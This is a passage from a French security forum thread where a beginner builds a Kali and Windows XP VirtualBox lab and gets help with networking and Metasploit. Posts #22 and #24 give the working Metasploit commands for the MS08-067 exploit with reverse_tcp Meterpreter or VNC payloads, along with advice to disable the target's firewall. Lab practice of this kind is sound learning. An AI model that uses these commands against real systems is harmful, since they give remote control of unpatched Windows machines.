Annonce

Réduire
Aucune annonce.

Kali linux machine cible (XP) injoignable via Metasploit (ConnectionRefused)

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • #16
    Je fait ça, et je te tiens au jus .

    Commentaire


    • #17
      Voilà , je crois que c'est clair là, il y a pas de carte réseau , rien .

      J'ai installer xp direct avec le cd pas par iso , et quand j'ai fait l'installe à l'arrache, c'était la même chose pas de réseau .Mais hier avec l'ancienne installe j'ai pu me connecté .

      Capture5.jpg

      http://www.casimages.com/img.php?i=1...5930583619.png

      Commentaire


      • #18
        les pilotes ne sont pas installés...

        bref

        télécharge une version de xp au format .iso (exemple ici)
        ensuite lance l'installation sur vitualbox avec le fichier .iso

        fait signe quand tu as de la connexion...

        Commentaire


        • #19
          Je télécharge ça ,et je réinstalle avec l'iso .


          Merci

          Commentaire


          • #20
            Tout est ok , je peux me connecté sur le web .J'ai pu installé SNMP ,coché internet information services, et le ftp .



            Donc si j'ai bien compris avec xp et kali je me connecte en accès par pont pour les 2 ? Une dernière chose comment faire un ping entre Kali et Xp sur virtual box ?

            Après j pense que je devrais m'en sortir tout seul ! Je met de toutes façon tout dans le bloc notes pour les tuyaux qu'ont me donnes, pour bien comprendre quand je suis pas sur le forum .

            Merci pour votre aide,et merci pour la copie .

            Commentaire


            • #21
              sur ta machine xp affiche le résultat de la commande ipconfig /all

              et sur ta machine kali affiche le résultat de la commande ifconfig

              Commentaire


              • #22
                A ce niveau une attaque sur ton xp virtuel un ping n'est pas forcement nécessaire puisqu'il sert essentiellement à la base à reconnaître la viabilitié ou tout du moins si l'hôte cible est atteignable.
                Sur ta machine Kali ouvre un terminale et entre ceci :

                ping ip_cible

                Par ip_cible j'entends l'ip recueillis comme pl3x te la preciser juste avant en ouvrant dans ton xp viruel un cmd et mis ipconfig.
                Normalement ta cible sera atteignable et du coup confirmé par le renvoie de tes paquets sinon tu aura un message.

                Il existe aussi la commande fping qui permet des balayages d'adrr ip.Mais je pense que sur une approche de reconnaissance sur local elle n'est pas forcèment nécessaire.Ensuite une fois établie ton Rhost ainsi que Lhost actif ,tu pourra reprendre ton process par rapport au livre.

                Comme il avais preciser une fois l'exploit choisis en fonction de la faille, en l'occurrence dans notre cas xp tu sera amener à utiliser ms08_067_netapi qui est la number one pour ce système.La meilleur charge est bien windows/vncinject/reverse_tcp comme l'avais preciser pl3x.Elle te permet donc sur windows xp / d'injecter VNC sur la cible XP et lui demander/ un retour de connection . Voila pour l'explication du payload.
                Alors n'oublie quand tu lancera lesploit de preciser :

                set RHOST ipduXP
                set LHOST ipdeKali

                Ensuite tu pourra lancer l'exploit. Si tout va bien et que tu a configurer le réseau convenablement tu aura un beau bureau avec edit de commande qui s'ouvrira.
                Je te conseille si tu ne l'a pas déjà fait car dans le bouquin on te donne les failles pas à pas de configurer Nessus sur ton kali. Et ensuite D'apprendre à ecrire en ligne de commande car souvent les acces donnent à des terminaux.
                Dernière modification par DreAmuS, 19 mai 2014, 08h00.

                Commentaire


                • #23
                  PL3X


                  voilà pour xp en réseau par pont

                  1.jpg

                  http://nsa33.casimages.com/img/2014/...5342667168.png


                  Pour kali pareil en réseau par pont :

                  [email protected]:~# ifconfig
                  eth0 Link encap:Ethernet HWaddr 08:00:27:dd:da:58
                  inet adr:192.168.0.14 Bcast:192.168.0.255 Masque:255.255.255.0
                  adr inet6: fe80::a00:27ff:fedd:da58/64 Scope:Lien
                  UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
                  RX packets:16 errors:0 dropped:0 overruns:0 frame:0
                  TX packets:36 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 lg file transmission:1000
                  RX bytes:2840 (2.7 KiB) TX bytes:3058 (2.9 KiB)

                  lo Link encap:Boucle locale
                  inet adr:127.0.0.1 Masque:255.0.0.0
                  adr inet6: ::1/128 Scope:Hôte
                  UP LOOPBACK RUNNING MTU:65536 Metric:1
                  RX packets:12 errors:0 dropped:0 overruns:0 frame:0
                  TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
                  collisions:0 lg file transmission:0
                  RX bytes:720 (720.0 B) TX bytes:720 (720.0 B)




                  Dreamus

                  je commence à y voir plus clair, j'ai regardé des tutos sur le réseau sur you tube .Donc pour que 2 machines communique si j'ai bien compris , j'ouvre la console je tape ipconfig et ensuite ping plus l'ip de la machine cible ,et pareil sur l'autre machine ! et si je suis en nat, me suffit de configurer moi même un ip ? pareil pour l'autre système .Je crois que c'est clair, avant de mettre les main dans metasploit, une base en réseau s'impose !


                  merci

                  Commentaire


                  • #24
                    c'est good

                    maintenant lance metasploit et exécute ta commande

                    exemple:

                    use exploit/windows/smb/ms08_067_netapi
                    set RHOST 192.168.0.13
                    check
                    (si tu as le message " Connection failed Rex:: ConnectionTmeout..." désactive le pare feu sur la machine xp)
                    set LHOST 192.168.0.14
                    set PAYLOAD windows/meterpreter/reverse_tcp
                    exploit

                    Commentaire


                    • #25
                      Voilà le rapport :

                      Xp est bien menacé .Donc si j'ai bien compris , pour le RHOST "adresse ip de la cible" qui me permet d'être en liaison avec la machine qui attaque .Et le LHOST "Ip de la machine qui attaque" , pour atteindre la machine cible .

                      2.jpg

                      http://nsa33.casimages.com/img/2014/...5640356416.png


                      Dreamus j'ai pris note pour ton aide , sa m'aide à bien comprendre tout ce bordel .

                      Merci

                      Commentaire


                      • #26
                        tu as désactivé le par feu sur la machine xp ?

                        Commentaire


                        • #27
                          Tout est désactivé !

                          mais te casse plus mec, je pense que je veux aller trop vite et brûler des étapes .Le livre sur Metasploit est encore trop compliqué pour mon cas, je vais continuer de bosser avec Les bases du hacking . Dans le bouquin sur Metasploit par ex, il demande d'installer SQL server 2005 express,le truc c'est que sur l'iso que tu ma envoyer, impossible de l'installer, c'est un xp sans service pack et tant mieux j'ai envie de dire, surtout pour apprendre .Dans "les bases du Hacking" il demande un Xp sans service pack , exactement celui que tu ma envoyer, et dedans il y a Metasploit expliqué de façon à être destiné aux gros débutant,c'est donc parfait .De plus j'ai tout les outils à dispo , un kali , un xp sans service pack, et un Metasploitable. Je pense qu'il est plus sage de tranquillement continué sur l'autre bouquin,doucement mais surement, et attaquer le bouquin destiné à Metasploit quand j'aurais acquis suffisamment de base .A commencer premièrement par piger un minimum le réseau et les fonctions de Metasploit , savoir identifier une adresse Ip .Là je veux aller trop vite, et je pense que si je galère comme ça, c'est tout simplement parce que j'ai pas encore assez le niveau pour m'en tirer même avec de l'aide .

                          Merci en tout cas pour les tuyaux , je garde ça de côté !

                          Commentaire


                          • #28
                            tu as raison prend ton temps pour acquérir des bases en informatique, ce n'est pas un sprint mais une course d'endurance

                            le truc c'est que sur l'iso que tu ma envoyer, impossible de l'installer, c'est un xp sans service pack
                            c'est un windows xp SP3, c'est marqué noir sur blanc su ta capture d’écran

                            @+

                            Commentaire


                            • #29
                              J'ai un sp 1 !!!

                              regarde PL3X

                              Capture3.jpg

                              http://nsa33.casimages.com/img/2014/...2728109433.png


                              Sa explique pourquoi je ne peux pas installer net framework 2.0 et SQl server 2005 express .

                              Commentaire


                              • #30
                                laisse tomber cette version de xp, c'est pas un bon exemple pour débuter (j'ai pris la première image iso proposé sur le net)

                                je viens de l'installer pour tester, c'est pas terrible "netapi32.dll" ne fait que planter avec l'exploit ms08_067_netapi

                                essaye avec cette version (je l'ai testé, aucun problème c'est une version "stable")
                                Dernière modification par pl3x, 19 mai 2014, 18h35.

                                Commentaire

                                Chargement...
                                X